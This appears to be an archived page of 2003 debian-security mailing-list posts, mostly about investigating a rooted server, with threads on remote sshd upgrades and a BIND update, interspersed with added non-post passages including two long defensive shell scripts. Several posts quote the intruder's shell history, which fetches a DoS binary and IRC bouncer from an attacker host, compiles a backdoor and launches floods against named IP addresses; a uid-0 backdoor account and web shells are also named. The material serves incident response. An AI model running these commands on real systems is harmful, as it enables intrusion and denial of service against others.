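Finding a script in the upload directory is only half the fix. The usual hardening (standard Apache practice, not something the thread itself describes) is to keep uploads outside the DocumentRoot altogether, or, if they must be served, to turn execution off for that directory with a `<Directory>` block containing `php_admin_flag engine off`, `Options -ExecCGI` and `RemoveHandler .php .cgi .pl`, and to reduce every uploaded filename to its basename on the server side so that Stefan's traversal case (`../` steering the file somewhere executable) cannot occur.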



Re: Strange segmentation faults and Zombies

2003-09-18 Thread Markus Schabel

Phillip Hofmeister wrote:

On Thu, 18 Sep 2003 at 09:08:28AM +0200, Markus Schabel wrote:


scp goodserver:/bin/gzip /bin/gzip


NO! Since there's the chance that the server got hacked I'm not
interested in giving him other passwords. copied from the other server
via scp.



scp from the clean system into the dirty one.  This way he won't get
access to the clean systems because the passwd for the clean system will
not be given to the dirty one.


In fact that was what I tried to explain with "copied from the other
server via scp." and have already done a lot of times...

thanks
Markus



Re: Strange segmentation faults and Zombies

2003-09-18 Thread Phillip Hofmeister
On Thu, 18 Sep 2003 at 09:08:28AM +0200, Markus Schabel wrote:
> >scp goodserver:/bin/gzip /bin/gzip
> NO! Since there's the chance that the server got hacked I'm not
> interested in giving him other passwords. copied from the other server
> via scp.

scp from the clean system into the dirty one.  This way he won't get
access to the clean systems because the passwd for the clean system will
not be given to the dirty one.

-- 
Phillip Hofmeister

PGP/GPG Key:
http://www.zionlth.org/~plhofmei/
wget -O - http://www.zionlth.org/~plhofmei/key.txt | gpg --import
--
Excuse #145: Short leg on process table 



Re: Remote update of ssh(d)

2003-09-18 Thread Philipp Hartmann
Hi again,

On Thu, 2003-09-18 at 12:32, Philipp Hartmann wrote:

> Afterwards I noticed, that the Version which sshd reports was still
> the old one. /etc/init.d/ssh restart seemed to have no effect.
> Presumably caused by my ssh connection, which was ((and had to be) still
> established. The top process of sshd was not killed/replaced.

Everything works fine now.
I found the problem: The file /var/run/sshd.pid was missing.
Why? Actually, I don't know. This shouldn't happen and it took a while
to get the clue.
But this has been the reason for the error.

Sorry for any confusion or rising blood pressure I caused with my mail.

Regards,
Philipp



RE: [sec] Re: Strange segmentation faults and Zombies

2003-09-18 Thread Christian Storch
The problem is starting >>before<<

id
mkdir /etc/.rpn
...

you should think about everything that's listening on a port:
- an outdated sshd? (!)
- security updates all up to date?
- known unclosed security hole?
- some nice scripts like 'rootshell.php'? ;)
- perl without tainting checks in cgi-bin?
etc.
etc.

Christian


-Original Message-
From: Markus Schabel [mailto:[EMAIL PROTECTED]
Sent: Thursday, September 18, 2003 12:23 PM
To: debian-security@lists.debian.org
Subject: Re: [sec] Re: Strange segmentation faults and Zombies

maximilian attems wrote:
> On Thu, 18 Sep 2003, Christian Storch wrote:
>
>
>>Don't forget to try to find the potential hole first!
>>Otherwise you could have a fast recurrence.
>>[..]
>>
in /etc/.rpn there's a .bash_history with the following content:

>id
>mkdir /etc/.rpn
>ps -aux
>ps -aux | grep tbk
>kill -15292 pid
>kill 15292
>netconf
>locate httpd.conf
>cd /etc/.rpn
>ls -al
>wget
>cd /var/www/cncmap/www/upload/renegade
>ls -al
>rm -rf phpshell.php
>
> ^__^
> was this the exploited hole ?

I think so. In fact the problem is that it got there...

regards
Markus





Re: Remote update of ssh(d)

2003-09-18 Thread Bernd Eckenfels
In article <[EMAIL PROTECTED]> you wrote:
> Does anyone know a more comfortable way to replace a sshd on a remote
> administrated box?

If I kill the top level listening sshd (you can extract its pid by running
"netstat -tpln | grep :22" as root) my ssh session is not dropped, and I can
restart a new one. 

You could also run a small script with nohup which does this for you.

Bernd
-- 
eckes privat - http://www.eckes.org/
Project Freefire - http://www.freefire.org/



Re: Remote update of ssh(d)

2003-09-18 Thread Jogi Hofmüller
hi!

* Philipp Hartmann <[EMAIL PROTECTED]> [2003-09-18 12:35]:

> Afterwards I noticed, that the Version which sshd reports was still
> the old one. /etc/init.d/ssh restart seemed to have no effect.
> Presumably caused by my ssh connection, which was ((and had to be) still
> established. The top process of sshd was not killed/replaced.

I cannot confirm this. I did the same thing yesterday (remote sshd update
on several boxes). After installing the new version and a restart I logged
in using ssh -v from another console to check if

- the new version was running
- I could still log in

Both things went OK.

Then I closed the session from the first connection.

greetings
-- 
Jogi Hofmüller 
http://mur.at/
Tel.: +43-316-821 451 55
Fax.: +43-316-821 451 26
Available: Mon, Wed, Thu, 10.00 - 14.00







Re: Strange segmentation faults and Zombies

2003-09-18 Thread Jan Niehusmann
On Thu, Sep 18, 2003 at 09:03:12AM +0200, Markus Schabel wrote:
> >wget www.slacks.hpg.com.br/bin/dos

That directory www.slacks.hpg.com.br/bin/ also contains some 
'interesting' files :-) Some exploits, rootkits etc.

Jan





Remote update of ssh(d)

2003-09-18 Thread Philipp Hartmann
Hi list,

I ran an update of ssh to 3.6.1p2-8 due to the recent errors in OpenSSH
on a system with remote access only.

Afterwards I noticed, that the Version which sshd reports was still
the old one. /etc/init.d/ssh restart seemed to have no effect.
Presumably caused by my ssh connection, which was ((and had to be) still
established. The top process of sshd was not killed/replaced.

The only workaround I found was the following:
- stop the firewall
- attach ssh to another port
- connect to the new port
- kill(!) the old sshd top process (ssh restart is not sufficient,   
  because the start-stop-daemon does not use this pid anymore)
- attach ssh back to port 22
- start the firewall
- kill the sshd listening on the other port

This is obviously quite annoying.

Does anyone know a more comfortable way to replace a sshd on a remote
administrated box?

Regards,

Philipp Hartmann
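The procedure above (rescue listener on a second port, kill the old top-level sshd, start the new one, drop the rescue listener), combined with Bernd's hint earlier on this page that killing only the listening sshd leaves existing sessions alive and Philipp's later finding that a missing /var/run/sshd.pid is what makes `/etc/init.d/ssh restart` a no-op, as an added example that is not part of any post in this thread. It assumes a Debian system with `/etc/init.d/ssh`, a pidfile written by start-stop-daemon, the column layout of `netstat -tpln`, and that the rescue port is reachable through the firewall; the netstat and `ssh -v` samples at the bottom are constructed for checking the parsers offline.

```shell
#!/bin/sh
# Added example (not from the thread): replace the listening sshd on a box you
# only reach over ssh, automating the steps described above. Assumes Debian
# with /etc/init.d/ssh, /var/run/sshd.pid written by start-stop-daemon, and
# the column layout of `netstat -tpln`. The rescue port must be reachable
# through the firewall (or open it first, as in the steps above).

# Pid of the sshd listening on port $1 (default 22), from `netstat -tpln`
# output on stdin. This is the top-level daemon that keeps running when the
# pidfile is missing and /etc/init.d/ssh restart therefore kills nothing.
listening_sshd_pid() {
    awk -v port="${1:-22}" '
        $6 == "LISTEN" && $4 ~ (":" port "$") {
            split($7, prog, "/")
            if (prog[2] == "sshd") { print prog[1]; exit }
        }'
}

# Software version the server announces, from `ssh -v` output on stdin.
remote_sshd_version() {
    sed -n 's/.*remote software version \([^ ]*\).*/\1/p' | head -n 1
}

# Pid recorded by start-stop-daemon, or empty when the pidfile is gone.
pidfile_pid() {
    [ -r "$1" ] && cat "$1"
    return 0
}

replace_sshd() {
    port="${1:-22}"; rescue_port="${2:-2222}"
    old_pid="$(pidfile_pid /var/run/sshd.pid)"
    [ -n "$old_pid" ] || old_pid="$(netstat -tpln | listening_sshd_pid "$port")"
    [ -n "$old_pid" ] || { echo "no sshd listening on port $port" >&2; return 1; }

    # Safety net: a second listener (the already-installed new binary) on
    # another port, so a failed restart does not lock us out. Its own
    # PidFile, otherwise it overwrites the one start-stop-daemon consults.
    /usr/sbin/sshd -p "$rescue_port" -o PidFile=/var/run/sshd-rescue.pid
    rescue_pid="$(netstat -tpln | listening_sshd_pid "$rescue_port")"
    [ -n "$rescue_pid" ] || { echo "rescue sshd did not start" >&2; return 1; }

    # Kill only the listener; per-connection children, including the one
    # serving this session, survive. Then start the new daemon.
    kill "$old_pid"
    i=0
    while kill -0 "$old_pid" 2>/dev/null && [ "$i" -lt 10 ]; do sleep 1; i=$((i + 1)); done
    /etc/init.d/ssh start

    new_pid="$(netstat -tpln | listening_sshd_pid "$port")"
    if [ -z "$new_pid" ] || [ "$new_pid" = "$old_pid" ]; then
        echo "no new listener on port $port; rescue sshd (pid $rescue_pid) left running" >&2
        return 1
    fi
    # Verify from a fresh connection, as Jogi did: the banner must come from
    # the new daemon, not from the session we are sitting in.
    ver="$(ssh -v -p "$port" -o BatchMode=yes localhost true 2>&1 | remote_sshd_version)"
    echo "sshd listening on $port as pid $new_pid, version ${ver:-unknown}"
    kill "$rescue_pid"
}

# Constructed sample output, for checking the parsers offline.
SAMPLE_NETSTAT='Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      612/apache
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      431/sshd
tcp        0      0 0.0.0.0:2222            0.0.0.0:*               LISTEN      9187/sshd'
SAMPLE_SSH_V='debug1: Remote protocol version 1.99, remote software version OpenSSH_3.6.1p2 Debian 1:3.6.1p2-8'

# Run detached so the procedure finishes even if this session drops:
#   nohup sh replace-sshd.sh --run 22 2222 &
case "${1:-}" in
    --run) replace_sshd "${2:-22}" "${3:-2222}" ;;
esac
```

Two points worth keeping in mind when adapting this: the version check must be made from a new connection, because the session you are typing in is served by a child forked from the old binary and will keep reporting the old version however many restarts you do; and the rescue daemon needs its own PidFile, since a second sshd started without one rewrites /var/run/sshd.pid and start-stop-daemon will then refuse to start the real one, thinking it is already running.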








Re: [sec] Re: Strange segmentation faults and Zombies

2003-09-18 Thread Markus Schabel

maximilian attems wrote:

On Thu, 18 Sep 2003, Christian Storch wrote:



Don't forget to try to find the potential hole first!
Otherwise you could have a fast recurrence.
[..]


in /etc/.rpn there's a .bash_history with the following content:


id
mkdir /etc/.rpn
ps -aux
ps -aux | grep tbk
kill -15292 pid
kill 15292
netconf
locate httpd.conf
cd /etc/.rpn
ls -al
wget
cd /var/www/cncmap/www/upload/renegade
ls -al
rm -rf phpshell.php


  ^__^
was this the exploited hole ?


I think so. In fact the problem is that it got there...

regards
Markus



Re: Verisign and Bind update

2003-09-18 Thread Lukas Ruf
-BEGIN PGP SIGNED MESSAGE-

Adrian von Bidder <[EMAIL PROTECTED]> [2003-09-18 11:21]:

> On Thursday 18 September 2003 11:01, Lukas Ruf wrote:
> > Adrian von Bidder <[EMAIL PROTECTED]> [2003-09-18 10:48]:
> > > rndc stops working for me. Anybody else seen this?
> >
> > have you checked the documentation that comes along with the update?
> >
> > > [EMAIL PROTECTED]:/etc/bind# /etc/init.d/bind9 reload
> > > rndc: connect failed: connection refused
> >
> > for me, it worked fine after doing the modifications "recommended" in
> > the short doc.
> 
> Is anything in the changelog.Debian.gz? Check. No.
> Is there a NEWS.Debian? Check. No.
> What is in README.Debian?
>  - upgrading from bind 8.x - does not apply
>  - Upgrading from earlier bind9 packages (prior to
> version 1:9.2.0-2 to be more precise) - does not apply.
> 
> No, I don't find anything that hints to this problem.
> 

I just took a look at the 3rd line of the to-be-installed
/etc/bind/named.conf where it read: 
/usr/share/doc/bind9/README.Debian.gz 

Reading this file pointed me to the way on how to solve the problem.


wbr,
Lukas
- -- 
Lukas Ruf   | Wanna know anything about raw |
 | IP?     |
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.3 (GNU/Linux)

iQCVAwUBP2mFgWg5P0zSC6LtAQECjAP/RPrGeUnd9SkDS62qtvB13UR7AXd3TJ58
Gi/FBL0fOtlPIum39iPg5qX4ukYKJEeXpN314jxcgHym+GVsQtwKZ4esIKVA11Bb
YD3hh8p1i18Z9sTl0dPVlZl+uHHHOyaeqjuDzHX8ARZIRG+RDR2d/8bi/f3GREkP
WxtSmHcyZYw=
=OWSl
-END PGP SIGNATURE-



Re: [sec] Re: Strange segmentation faults and Zombies

2003-09-18 Thread maximilian attems
On Thu, 18 Sep 2003, Christian Storch wrote:

> Don't forget to try to find the potential hole first!
> Otherwise you could have a fast recurrence.
> [..]
> > > in /etc/.rpn there's a .bash_history with the following content:
> > > >id
> > > >mkdir /etc/.rpn
> > > >ps -aux
> > > >ps -aux | grep tbk
> > > >kill -15292 pid
> > > >kill 15292
> > > >netconf
> > > >locate httpd.conf
> > > >cd /etc/.rpn
> > > >ls -al
> > > >wget
> > > >cd /var/www/cncmap/www/upload/renegade
> > > >ls -al
> > > >rm -rf phpshell.php
  ^__^
was this the exploited hole ?

thx for info
a++ maks
 


--  
 free software is not free at all, and "actually a different form of monopoly"
 ARLENE MCCARTHY member of the european parliament (labour party)
 -> http://swpat.ffii.org/#guardian-nhill030619
 please pay attention avoiding software patents:
 -> http://swpat.ffii.org/index.en.html





Re: Verisign and Bind update

2003-09-18 Thread Adrian von Bidder
On Thursday 18 September 2003 11:01, Lukas Ruf wrote:
> Adrian von Bidder <[EMAIL PROTECTED]> [2003-09-18 10:48]:
> > rndc stops working for me. Anybody else seen this?
>
> have you checked the documentation that comes along with the update?
>
> > [EMAIL PROTECTED]:/etc/bind# /etc/init.d/bind9 reload
> > rndc: connect failed: connection refused
>
> for me, it worked fine after doing the modifications "recommended" in
> the short doc.

Is anything in the changelog.Debian.gz? Check. No.
Is there a NEWS.Debian? Check. No.
What is in README.Debian?
 - upgrading from bind 8.x - does not apply
 - Upgrading from earlier bind9 packages (prior to
version 1:9.2.0-2 to be more precise) - does not apply.

No, I don't find anything that hints to this problem.

cheers
-- vbi (Yes, I could fix it - wrote so in my other mail).

-- 
No good deed goes unpunished.




Re: Verisign and Bind update

2003-09-18 Thread Adrian von Bidder
On Thursday 18 September 2003 10:45, Adrian von Bidder wrote:

> rndc stops working for me. Anybody else seen this?
>
> [EMAIL PROTECTED]:/etc/bind# /etc/init.d/bind9 reload
> rndc: connect failed: connection refused

(yes, yes,  replying to meself...)

Ok: reason: named now runs as root instead of bind, so it couldn't read the 
rndc.key file. Is this intentional? I was upgrading from current testing.

Another thing: still missing versioned dependency on one of these libraries:
libdns10, libisc7, libisccc0, libisccfg0, liblwres1

(Dunno which one is really necessary, I just upgraded all depends after it 
complained about config file unexpected token delegation-only.)

But all in all, a very very big THANK YOU to LaMont Jones & the ISC for 
'resolving' this problem so quickly. Now I just hope Verislime doesn't start 
to dynamically generate delegations, too...

greets
-- vbi


-- 
precious




Re: Verisign and Bind update

2003-09-18 Thread Lukas Ruf
-BEGIN PGP SIGNED MESSAGE-

Adrian von Bidder <[EMAIL PROTECTED]> [2003-09-18 10:48]:

> On Wednesday 17 September 2003 17:26, Ilkka Tuohela wrote:
> > Wed, 2003-09-17 at 18:12, James Miller wrote:
> > > Will the package maintainers of BIND be integrating the patches from
> > > ISC-BIND to negate  Verisign's recent shenanigans?
> >
> > Well, it's not only a patch, it's part of bind upstream releases, so yes
> > of course it will eventually be in the packaged version.
> >
> > Actually, there already seems to be a release with this available.
> 
> rndc stops working for me. Anybody else seen this?
> 

have you checked the documentation that comes along with the update?

> [EMAIL PROTECTED]:/etc/bind# /etc/init.d/bind9 reload
> rndc: connect failed: connection refused
> 

for me, it worked fine after doing the modifications "recommended" in
the short doc.

wbr,
Lukas
- -- 
Lukas Ruf   | Wanna know anything about raw |
 | IP?     |
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.3 (GNU/Linux)

iQCVAwUBP2l0eWg5P0zSC6LtAQGgXAP/br/9I3W6CymnbJ4SRKNz0U20E5D5CkAL
3ITJKHhJidsmayKQ5ICcOhMJpBbcm+tQbg+ADy3rHQ6Hkl56RTFecd2FhaeAzlGV
4+PQSu6cNpgh0Cw13mD1hpH3qxFyt2kuAsaBEhmLksQOSvBGORRVlEE3fKX0lulr
9HTwTHnbf4s=
=8lB7
-END PGP SIGNATURE-



Re: Verisign and Bind update

2003-09-18 Thread Adrian von Bidder
On Wednesday 17 September 2003 17:26, Ilkka Tuohela wrote:
> Wed, 2003-09-17 at 18:12, James Miller wrote:
> > Will the package maintainers of BIND be integrating the patches from
> > ISC-BIND to negate  Verisign's recent shenanigans?
>
> Well, it's not only a patch, it's part of bind upstream releases, so yes
> of course it will eventually be in the packaged version.
>
> Actually, there already seems to be a release with this available.

rndc stops working for me. Anybody else seen this?

[EMAIL PROTECTED]:/etc/bind# /etc/init.d/bind9 reload
rndc: connect failed: connection refused


cheers
-- vbi

-- 
All bridge hands are equally likely, but some are more equally likely
than others.
-- Alan Truscott





Re: Strange segmentation faults and Zombies

2003-09-18 Thread Christian Storch
Don't forget to try to find the potential hole first!
Otherwise you could have a fast recurrence.

Christian

- Original Message -
From: "Josh Carroll" <[EMAIL PROTECTED]>
To: 
Sent: Thursday, September 18, 2003 9:12 AM
Subject: Re: Strange segmentation faults and Zombies


> Backup /etc and any other data you have, and you can reference your 
> configuration files later
> during your re-install.
>
> At this point, re-installation is a must. Never delude yourself into thinking 
> you can 'recover'
> from being rooted. Sure, you might be able to do so after a lot of 
> effort/etc, but then again
maybe
> you'll forget something and a backdoor will remain. Best bet is to 
> re-install, referencing your
> existing configuration files (though I would NOT use them as-is without 
> inspection, since they
> could potentially have backdoor'd the configs as well).
>
> Good luck.
>
> Josh
>
>
> Markus Schabel ([EMAIL PROTECTED]) wrote:
> > Laurent Corbes {Caf'} wrote:
> > >On Wed, 17 Sep 2003 22:29:58 +0200
> > >Markus Schabel <[EMAIL PROTECTED]> wrote:
> > >
> > >
> > >>I've seen some strange things on my (stable with security-updates)
> > >>server: the last apt-get update didn't work because gzip segfaulted.
> > >>I've copied gzip from another server over the version on this server,
> > >>but it also crashed. Interesting was that the executable was bigger
> > >>after the segfault.
> > >
> > >
> > >curious.
> > >
> > >
> > >>In a ps I can see a lot of Zombies (rm, ln, readlink, grep) and I've no
> > >>idea where they come from.
> > >
> > >
> > >it's the daily cronjob that stole.
> >
> > yes, and that's reproducible :(
> >
> > >>You think the server got hacked? Are there any other things that can
> > >>lead to this? man also behaves strange, it says either "No manual entry
> > >>for...", "What manual page do you want?" or nothing.
> > >
> > >
> > >i'm thinking about a hardware problem.
> > >may the harddrive is in failure (get the ouput of dmesg) or a very big
> > >ram problem that corrupt files on the hard drive.
> >
> > request_module[net-pf-14]: waitpid(15400,...) failed, errno 1
> > ptrace uses obsolete (PF_INET,SOCK_PACKET)
> > eth0: Promiscuous mode enabled.
> > device eth0 entered promiscuous mode
> > eth0: Promiscuous mode enabled.
> >
> > but nothing about the disks
> >
> > >in every case simply copy all the data you can and inspect the hdd in
> > >another box mounting it read only.
> >
> > setuid.changes lists /dev/* and the following programs:
> > pppd
> > postdrop
> > postqueue
> > wall
> > newgrp
> > at
> > chage
> > chfn
> > chsh
> > expiry
> > gpasswd
> > passwd
> > write
> > crontab
> > dotlockfile
> > ssh-keysign
> > procmail
> > lockfile
> > popauth
> > pt_chown
> > traceroute
> > mount
> > umount
> > login
> > su
> > ping
> > suexec
> > /usr/lib/mc/bin/cons.saver
> >
> > and a new user exists in /etc/passwd: slacks:x:0:0::/etc/.rpn:/bin/bash
> >
> > in /etc/.rpn there's a .bash_history with the following content:
> >
> > >id
> > >mkdir /etc/.rpn
> > >ps -aux
> > >ps -aux | grep tbk
> > >kill -15292 pid
> > >kill 15292
> > >netconf
> > >locate httpd.conf
> > >cd /etc/.rpn
> > >ls -al
> > >wget
> > >cd /var/www/cncmap/www/upload/renegade
> > >ls -al
> > >rm -rf phpshell.php
> > >cat bd.c
> > >gcc -o bd bd.c
> > >ftp ftp.hpg.com.br
> > >rm -rf bd.c
> > >cd /tmp
> > >cd /etc/.rpn
> > >wget www.slacks.hpg.com.br/psyBNC.tar.gz
> > >tar zvxf psyBNC.tar.gz
> > >tar -zvxf psyBNC.tar.gz
> > >tar
> > >gunzip psyBNC.tar.gz
> > >tar -Acdtrux psyBNC.tar.gz
> > >tar -x psyBNC.tar.gz
> > >tar -Acd psyBNC.tar.gz
> > >tar -cd psyBNC.tar.gz
> > >tar --help
> > >pwd
> > >ls
> > >rm -rf *
> > >wget www.slacks.hpg.com.br/bin/dos
> > >chmod +x dos
> > >./dos
> > >./dos 200.101.87.8 65535 8569
> > >./dos 200.199.95.11 65535 8569
> >
> > and the executable dos
> >
> > interesting is the line "tar --help" :D
> >
> > in "last" I see the following:
> >
> > >slacks   pts/0Sun Sep 14 02:26 - 03:37  (01:11)
> > >200-147-107-35.tlm.dialuol.com.br
> >
> > IP of the hacker is 200.147.107.35
> > I think we have no chance of legal actions against .br?
> >
> > in the directory /var/www/cncmap/www/upload/renegade there are the
> > following files: backhole.pl
> > e.c ("Copyright (c) 2003 DTORS Security, ANGELO ROSIELLO 18/02/2003,
> > LES-EXPLOIT for Linux x86")
> > rem.php (phpRemoteView)
> >
> > so we got hacked :(
> >
> > what information should we gather before we reinstall the complete
> > server? I think we have to reinstall the whole thing or do you have
> > any ideas?
> >
> > thanks
> > Markus
> >
> >
> >
>
>
>
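Markus asks what to gather before the reinstall. The following is an added example, not from any post in this thread, of a first-pass evidence collection that records exactly the traces he reports above: the extra uid-0 account in /etc/passwd, the hidden /etc/.rpn directory with the attacker's .bash_history and downloaded tools, the promiscuous-mode messages in dmesg, the attacker's logins from `last`, and the setuid list to diff against checksecurity's setuid.changes. It assumes the dirty disk is mounted read-only under a path on a clean machine (Laurent's advice), so none of the compromised box's binaries are executed; the passwd, dmesg and `last` samples are constructed from the lines quoted in the thread, with the root login line and `admin.example.net` being made up.

```shell
#!/bin/sh
# Added example (not from the thread): first-pass evidence collection for a
# rooted box before it is reinstalled, covering the traces reported above:
# an extra uid-0 account, a hidden directory under /etc with the attacker's
# shell history, a sniffer's promiscuous mode, the attacker's logins and the
# changed setuid binaries. Assumes the disk is mounted read-only under $ROOT
# on a clean machine; none of the dirty box's own binaries are used (its gzip
# was already trojaned).

# Accounts with uid 0 other than root, from passwd text on stdin.
extra_uid0_accounts() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 ":" $6 ":" $7 }'
}

# Dot-directories directly under $1 (the /etc/.rpn hiding spot).
hidden_dirs_in() {
    find "$1" -mindepth 1 -maxdepth 1 -type d -name '.*' | sort
}

# Number of "promiscuous mode" kernel messages in dmesg text on stdin.
promisc_count() {
    grep -c 'Promiscuous mode enabled' || true
}

# Source hosts of $1's logins, from `last` output on stdin.
login_hosts_of() {
    awk -v u="$1" '$1 == u { print $3 }' | sort -u
}

# Setuid files below $1, printed relative to it, for diffing against a clean
# install of the same release or against checksecurity's setuid.changes.
setuid_files() {
    find "$1" -xdev -type f -perm -4000 2>/dev/null | sed "s|^$1||" | sort
}

collect_evidence() {
    root="$1"; out="$2"
    mkdir -p "$out"
    extra_uid0_accounts < "$root/etc/passwd" > "$out/uid0-accounts.txt"
    hidden_dirs_in "$root/etc"               > "$out/hidden-etc-dirs.txt"
    setuid_files "$root"                     > "$out/setuid-files.txt"
    [ -r "$root/var/log/wtmp" ] && last -f "$root/var/log/wtmp" > "$out/last.txt"
    # Copy the hidden directories whole: shell history plus downloaded tools
    # (bd, dos, psyBNC) rather than just a listing of them.
    for d in $(hidden_dirs_in "$root/etc"); do
        cp -a "$d" "$out/etc-$(basename "$d")"
    done
    # Only meaningful on the still-running box, not on a mounted disk image.
    [ "$root" = "/" ] && dmesg | promisc_count > "$out/promisc-count.txt"
    # Checksum the evidence so it can later be shown unchanged.
    find "$out" -type f ! -name SHA1SUMS -exec sha1sum {} + > "$out/SHA1SUMS"
    return 0
}

# Constructed samples (the slacks lines are the ones quoted in the thread;
# the root login and admin.example.net are made up).
SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/bin/sh
slacks:x:0:0::/etc/.rpn:/bin/bash'
SAMPLE_DMESG='eth0: Promiscuous mode enabled.
device eth0 entered promiscuous mode
eth0: Promiscuous mode enabled.'
SAMPLE_LAST='root     pts/1        admin.example.net Mon Sep 15 09:02 - 09:40  (00:38)
slacks   pts/0        200-147-107-35.tlm.dialuol.com.br Sun Sep 14 02:26 - 03:37  (01:11)'

# Usage on the clean host: sh triage.sh --run /mnt/dirty /var/tmp/evidence
case "${1:-}" in
    --run) collect_evidence "${2:-/mnt/dirty}" "${3:-/var/tmp/evidence}" ;;
esac
```

The point of doing this from a clean host with the disk mounted read-only is the same one Markus ran into with gzip: once a box is rooted, `ps`, `ls`, `netstat` and even the kernel on it can lie, so anything observed through them is of limited value, while files read from the raw filesystem on another machine are not subject to that. The `last` output is still only as trustworthy as wtmp, which the attacker could have edited, so treat the absence of a login as no evidence at all.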







Re: about sendmail hole - relay restrictions bypassed

2003-09-18 Thread Jeremy T. Bouse
In all fairness, if this issue is in regards to the Verisign cluster
fsck I don't think this has any place in Sendmail personally but rather
in getting Verisign to un-fsck the problem and/or fix DNS servers not to
respond in that manner as to allow that to happen...

Regards,
Jeremy

On Thu, Sep 18, 2003 at 12:49:38PM +0900, Hideki Yamane wrote:
> Hi list,
> 
>  You know, as DSA-384-1, sendmail buffer overflow vulnerability
>  is fixed but another hole "sendmail relay access restrictions 
>  can be bypassed with bogus DNS"(*) is NOT fixed yet.
> 
>  * http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=174907
> 
>  Do you know why maintainer let this issue alone ?
>  or not effect Debian package? (if so, this bug should be closed.)
> 
> -- 
> Regards,
> 
>  Hideki Yamane   mailto:henrich @ iijmio-mail.jp
> 
> 




Re: Verisign and Bind update

2003-09-18 Thread Adrian von Bidder
On Thursday 18 September 2003 11:01, Lukas Ruf wrote:
> Adrian von Bidder <[EMAIL PROTECTED]> [2003-09-18 10:48]:
> > rndc stops working for me. Anybody else seen this?
>
> have you checked the documentation that comes along with the update?
>
> > [EMAIL PROTECTED]:/etc/bind# /etc/init.d/bind9 reload
> > rndc: connect failed: connection refused
>
> for me, it worked fine after doing the modifications "recommended" in
> the short doc.

Is anything in the changelog.Debian.gz? Check. No.
Is there a NEWS.Debian? Check. No.
What is in README.Debian?
 - upgrading from bind 8.x - does not apply
 - Upgrading from earlier bind9 packages (prior to
version 1:9.2.0-2 to be more precise) - does not apply.

No, I don't find anything that hints to this problem.

cheers
-- vbi (Yes, I could fix it - wrote so in my other mail).

-- 
No good deed goes unpunished.




Re: Strange segmentation faults and Zombies

2003-09-18 Thread Josh Carroll
Backup /etc and any other data you have, and you can reference your 
configuration files later
during your re-install.

At this point, re-installation is a must. Never delude yourself into thinking 
you can 'recover'
from being rooted. Sure, you might be able to do so after a lot of effort/etc, 
but then again maybe
you'll forget something and a backdoor will remain. Best bet is to re-install, 
referencing your
existing configuration files (though I would NOT use them as-is without 
inspection, since they
could potentially have backdoor'd the configs as well).

Good luck.

Josh


Markus Schabel ([EMAIL PROTECTED]) wrote:
> Laurent Corbes {Caf'} wrote:
> >On Wed, 17 Sep 2003 22:29:58 +0200
> >Markus Schabel <[EMAIL PROTECTED]> wrote:
> >
> >
> >>I've seen some strange things on my (stable with security-updates)
> >>server: the last apt-get update didn't work because gzip segfaulted.
> >>I've copied gzip from another server over the version on this server,
> >>but it also crashed. Interesting was that the executable was bigger
> >>after the segfault.
> >
> >
> >curious.
> >
> >
> >>In a ps I can see a lot of Zombies (rm, ln, readlink, grep) and I've no
> >>idea where they come from.
> >
> >
> >it's the daily cronjob that stole.
> 
> yes, and that's reproducible :(
> 
> >>You think the server got hacked? Are there any other things that can
> >>lead to this? man also behaves strange, it says either "No manual entry
> >>for...", "What manual page do you want?" or nothing.
> >
> >
> >i'm thinking about a hardware problem. 
> >may the harddrive is in failure (get the output of dmesg) or a very big
> >ram problem that corrupt files on the hard drive.
> 
> request_module[net-pf-14]: waitpid(15400,...) failed, errno 1
> ptrace uses obsolete (PF_INET,SOCK_PACKET)
> eth0: Promiscuous mode enabled.
> device eth0 entered promiscuous mode
> eth0: Promiscuous mode enabled.
> 
> but nothing about the disks
> 
> >in every case simply copy all the data you can and inspect the hdd in
> >another box mounting it read only.
> 
> setuid.changes lists /dev/* and the following programs:
> pppd
> postdrop
> postqueue
> wall
> newgrp
> at
> chage
> chfn
> chsh
> expiry
> gpasswd
> passwd
> write
> crontab
> dotlockfile
> ssh-keysign
> procmail
> lockfile
> popauth
> pt_chown
> traceroute
> mount
> umount
> login
> su
> ping
> suexec
> /usr/lib/mc/bin/cons.saver
> 
> and a new user exists in /etc/passwd: slacks:x:0:0::/etc/.rpn:/bin/bash
> 
> in /etc/.rpn there's a .bash_history with the following content:
> 
> >id
> >mkdir /etc/.rpn
> >ps -aux
> >ps -aux | grep tbk
> >kill -15292 pid
> >kill 15292
> >netconf
> >locate httpd.conf
> >cd /etc/.rpn
> >ls -al
> >wget
> >cd /var/www/cncmap/www/upload/renegade
> >ls -al
> >rm -rf phpshell.php
> >cat bd.c
> >gcc -o bd bd.c
> >ftp ftp.hpg.com.br
> >rm -rf bd.c
> >cd /tmp
> >cd /etc/.rpn
> >wget www.slacks.hpg.com.br/psyBNC.tar.gz
> >tar zvxf psyBNC.tar.gz
> >tar -zvxf psyBNC.tar.gz
> >tar
> >gunzip psyBNC.tar.gz
> >tar -Acdtrux psyBNC.tar.gz
> >tar -x psyBNC.tar.gz
> >tar -Acd psyBNC.tar.gz
> >tar -cd psyBNC.tar.gz
> >tar --help
> >pwd
> >ls
> >rm -rf *
> >wget www.slacks.hpg.com.br/bin/dos
> >chmod +x dos
> >./dos
> >./dos 200.101.87.8 65535 8569
> >./dos 200.199.95.11 65535 8569
> 
> and the executable dos
> 
> interesting is the line "tar --help" :D
> 
> in "last" I see the following:
> 
> >slacks   pts/0        Sun Sep 14 02:26 - 03:37  (01:11) 200-147-107-35.tlm.dialuol.com.br
> 
> IP of the hacker is 200.147.107.35
> I think we have no chance of legal actions against .br?
> 
> in the directory /var/www/cncmap/www/upload/renegade there are the
> following files: backhole.pl
> e.c ("Copyright (c) 2003 DTORS Security, ANGELO ROSIELLO 18/02/2003, 
> LES-EXPLOIT for Linux x86")
> rem.php (phpRemoteView)
> 
> so we got hacked :(
> 
> what information should we gather before we reinstall the complete
> server? I think we have to reinstall the whole thing or do you have
> any ideas?
> 
> thanks
> Markus
> 
> 



Re: Verisign and Bind update

2003-09-18 Thread Adrian von Bidder
